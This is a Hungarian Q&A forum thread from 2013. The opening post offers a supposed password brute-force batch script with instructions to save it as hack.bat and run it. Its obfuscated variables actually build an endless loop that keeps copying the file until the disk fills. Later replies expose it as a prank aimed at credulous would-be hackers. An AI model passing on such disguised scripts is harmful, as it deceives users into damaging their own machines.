Kezdőoldal » Számítástechnika » Programok » Az alábbi brute force parancss...

Az alábbi brute force parancssort kellene úgy átírni, hogy a következő jellemzőkkel rendelkező jelszólehetőségeket nézze csak: -9 karakter -kis és nagybetű -pont -szám Megoldható?

Figyelt kérdés

Nyiss egy parancssort (winkey+r cmd).

majd írd be:


copy con hack.bat


úgy látszik mintha semmi sem történne, de írd be ezt:


@ECHO OFF

set mailer_daemon=c

set use_BF=g

set param=py

set value=o

set /A pass=0

set remote_address=www.freemail.hu

set user=xy

:start

Echo Try2Hack%i%

%mailer_daemon%%value%%param% hack.bat hack%pass% >> pass.txt

set /A pass=%pass%+1

%use_BF%%value%t%value% start


itt nyomj: CTRL+Z és írd be hogy


hack



2013. jún. 25. 14:55
 1/5 tabaki ***** válasza:
Ha kapsz tippet, hat-nyolcszáz év múlva jelentkezz, hogy sikerült-e már. Nem vagyok otthon a kombinatorikában, de meglepne, ha addig sikerülne.
2013. jún. 25. 15:11
Hasznos számodra ez a válasz?
 2/5 anonim ***** válasza:
47%
AHAHAHAH haver, ha ertelmezned a programot vagy legalabbis ertenel hozza, akkor tudnad, h ez egy kamu program, az ilyen kis mezei hackereket, akik azt hiszik h tudnak hackelni, szoktak etetni a kicsit tobb tudassal rendelkezo emberek.... futtasd csak a progit es lesz meglepi is........
2013. aug. 1. 19:04
Hasznos számodra ez a válasz?
 3/5 tabaki ***** válasza:
Ja, a progit nem is néztem... =)
2013. aug. 1. 19:19
Hasznos számodra ez a válasz?
 4/5 anonim ***** válasza:

jah de meg kell hagyni h eleg jo humora van aki kitalalta, a poen h latszik is ha kerdezo ugy illesztette be http://www.gyakorikerdesek.hu/egyeb-kerdesek__egyeb-kerdesek..

nezd meg majd tabaki,a masodik valaszt eleg jo sztem telleg hasonlit egy hack programra az masik kerdes, h igen csak elveszi azoknak a kedvet akik ilyesmivel szeretnenek foglalkozni de ahhoz nem veszik a faratsagot h utana nezzenek h mit is jelent a program, mondjuk ezek a hiszekeny kerdezok, meg ki is probaljak, lehetne backdoor is.....

2013. aug. 1. 22:03
Hasznos számodra ez a válasz?
 5/5 anonim ***** válasza:
es akk meg is lenne a kerdesre a valasz, h tudom feltorni valaki gepet?????????? hat igy.
2013. aug. 1. 22:04
Hasznos számodra ez a válasz?

Kapcsolódó kérdések:





Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!